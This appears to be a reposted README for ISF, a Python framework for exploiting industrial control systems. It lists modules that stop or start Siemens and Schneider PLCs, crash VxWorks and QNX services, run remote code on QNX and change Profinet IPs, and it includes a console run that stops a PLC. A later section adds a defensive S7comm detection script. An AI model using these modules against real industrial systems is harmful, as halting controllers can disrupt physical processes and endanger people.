ISF - Industrial Control System Exploitation Framework
Wednesday, September 11, 2019
ISF (Industrial Exploitation Framework) is an exploitation framework based on Python. It is similar to the Metasploit framework.
ISF is based on the open source project routersploit.
ICS Protocol Clients
Name | Path | Description |
---|---|---|
modbus_tcp_client | icssploit/clients/modbus_tcp_client.py | Modbus-TCP Client |
wdb2_client | icssploit/clients/wdb2_client.py | WdbRPC Version 2 Client (Vxworks 6.x) |
s7_client | icssploit/clients/s7_client.py | s7comm Client(S7 300/400 PLC) |
Exploit Module
Name | Path | Description |
---|---|---|
s7_300_400_plc_control | exploits/plcs/siemens/s7_300_400_plc_control.py | S7-300/400 PLC start/stop |
s7_1200_plc_control | exploits/plcs/siemens/s7_1200_plc_control.py | S7-1200 PLC start/stop/reset |
vxworks_rpc_dos | exploits/plcs/vxworks/vxworks_rpc_dos.py | Vxworks RPC remote dos(CVE-2015-7599) |
quantum_140_plc_control | exploits/plcs/schneider/quantum_140_plc_control.py | Schneider Quantum 140 serial PLC start/stop |
crash_qnx_inetd_tcp_service | exploits/plcs/qnx/crash_qnx_inetd_tcp_service.py | QNX Inetd TCP service dos |
qconn_remote_exec | exploits/plcs/qnx/qconn_remote_exec.py | QNX qconn remote code execution |
profinet_set_ip | exploits/plcs/siemens/profinet_set_ip.py | Profinet DCP device IP config |
Scanner Module
Name | Path | Description |
---|---|---|
profinet_dcp_scan | scanners/profinet_dcp_scan.py | Profinet DCP scanner |
vxworks_6_scan | scanners/vxworks_6_scan.py | Vxworks 6.x scanner |
s7comm_scan | scanners/s7comm_scan.py | S7comm scanner |
enip_scan | scanners/enip_scan.py | EthernetIP scanner |
ICS Protocols Module (Scapy Module)
These protocols can be used in other fuzzing frameworks such as Kitty, or to build your own client.
Name | Path | Description |
---|---|---|
pn_dcp | icssploit/protocols/pn_dcp | Profinet DCP Protocol |
modbus_tcp | icssploit/protocols/modbus_tcp | Modbus TCP Protocol |
wdbrpc2 | icssploit/protocols/wdbrpc2 | WDB RPC Version 2 Protocol |
s7comm | icssploit/protocols/s7comm.py | S7comm Protocol |
Install
Python requirements
- gnureadline (OSX only)
- requests
- paramiko
- beautifulsoup4
- pysnmp
- python-nmap
- scapy (we suggest installing scapy manually, following its official documentation)
Install on Kali
```
git clone https://github.com/dark-lbp/isf/
cd isf
python isf.py
```
Usage
```
root@kali: /Desktop/temp/isf# python isf.py

[ICSSPLOIT ASCII-art banner]

        ICS Exploitation Framework

Note     : ICSSPOLIT is fork from routersploit at
           https://github.com/reverse-shell/routersploit
Dev Team : wenzhe zhu(dark-lbp)
Version  : 0.1.0

Exploits: 2 Scanners: 0 Creds: 13

ICS Exploits:
    PLC: 2          ICS Switch: 0
    Software: 0

isf >
```
Exploits
```
isf > use exploits/plcs/
exploits/plcs/siemens/  exploits/plcs/vxworks/
isf > use exploits/plcs/siemens/s7_300_400_plc_control
exploits/plcs/siemens/s7_300_400_plc_control
isf > use exploits/plcs/siemens/s7_300_400_plc_control
isf (S7-300/400 PLC Control) >
```
You can use the tab key for completion.
Options
Display module options:
```
isf (S7-300/400 PLC Control) > show options

Target options:

   Name       Current settings     Description
   ----       ----------------     -----------
   target                          Target address e.g. 192.168.1.1
   port       102                  Target Port

Module options:

   Name        Current settings     Description
   ----        ----------------     -----------
   slot        2                    CPU slot number.
   command     1                    Command 0:start plc, 1:stop plc.

isf (S7-300/400 PLC Control) >
```
Set options
```
isf (S7-300/400 PLC Control) > set target 192.168.70.210
[+] {'target': '192.168.70.210'}
```
Run module
```
isf (S7-300/400 PLC Control) > run
[*] Running module...
[+] Target is alive
[*] Sending packet to target
[*] Stop plc
isf (S7-300/400 PLC Control) >
```
Display information about exploit
```
isf (S7-300/400 PLC Control) > show info

Name:
S7-300/400 PLC Control

Description:
Use S7comm command to start/stop plc.

Devices:
- Siemens S7-300 and S7-400 programmable logic controllers (PLCs)

Authors:
- wenzhe zhu <jtrkid[at]gmail.com>

References:

isf (S7-300/400 PLC Control) >
```
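The module above changes CPU state with a single S7comm request on TCP/102, so a network sensor can flag it by decoding the request header. The following is an added detection example, not code from ISF or from the original page. It assumes classic S7comm framing (TPKT, COTP, protocol id 0x32) and the function codes 0x28 and 0x29 as named in public protocol dissectors; the function names, the sample frames and every address other than 192.168.70.210 are constructed for illustration.

```python
import struct

# Function codes as named in public S7comm dissectors (assumption, not from the page).
CONTROL_FUNCS = {0x28: "PI service (start/control)", 0x29: "PLC stop"}
ROSCTR_JOB = 0x01  # request PDUs; acknowledgements use other ROSCTR values


def classify_s7_payload(payload: bytes):
    """Return a label when a TCP/102 payload is an S7comm CPU-control Job, else None."""
    if len(payload) < 7 or payload[0] != 0x03:           # TPKT version 3
        return None
    if struct.unpack(">H", payload[2:4])[0] != len(payload):
        return None                                       # partial segment: needs reassembly
    if payload[5] != 0xF0:                                # only COTP DT carries S7comm
        return None
    s7 = payload[5 + payload[4]:]                         # skip COTP length byte + header
    if len(s7) < 11 or s7[0] != 0x32 or s7[1] != ROSCTR_JOB:
        return None
    if struct.unpack(">H", s7[6:8])[0] < 1:               # parameter block must exist
        return None
    return CONTROL_FUNCS.get(s7[10])                      # first parameter byte = function


def find_control_commands(events, engineering_hosts):
    """events: (src_ip, dst_ip, payload) tuples seen on TCP/102. Returns alert dicts."""
    alerts = []
    for src, dst, payload in events:
        label = classify_s7_payload(payload)
        if label:
            alerts.append({"src": src, "dst": dst, "command": label,
                           "authorized_source": src in engineering_hosts})
    return alerts


def sample_frame(rosctr, func):
    """Constructed test frame: protocol headers plus a one-byte parameter block only."""
    s7 = struct.pack(">BBHHHH", 0x32, rosctr, 0, 1, 1, 0) + bytes([func])
    body = b"\x02\xf0\x80" + s7
    return struct.pack(">BBH", 3, 0, 4 + len(body)) + body


# Constructed events; 192.168.70.210 is the PLC address used in the transcript above.
SAMPLE_EVENTS = [
    ("192.168.70.10", "192.168.70.210", sample_frame(0x01, 0x04)),      # read variable
    ("192.168.70.10", "192.168.70.210", sample_frame(0x01, 0x28)),      # engineering host
    ("192.168.70.66", "192.168.70.210", sample_frame(0x01, 0x29)),      # unknown host
    ("192.168.70.66", "192.168.70.210", sample_frame(0x03, 0x29)),      # Ack_Data, no request
    ("192.168.70.66", "192.168.70.210", sample_frame(0x01, 0x29)[:-3]), # truncated segment
]

if __name__ == "__main__":
    for alert in find_control_commands(SAMPLE_EVENTS, {"192.168.70.10"}):
        print(alert)
```

Alerts with `authorized_source` set to false are the ones to escalate; a production sensor would also reassemble TCP segments before classification.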
Documents
- Modbus-TCP Client usage
- WDBRPCV2 Client usage
- S7comm Client usage
- SNMP_bruteforce usage
- S7 300/400 PLC password bruteforce usage
- Vxworks 6.x Scanner usage
- Profinet DCP Scanner usage
- S7comm PLC Scanner usage
- Profinet DCP Set ip module usage
- Load modules from extra folder
- How to write your own module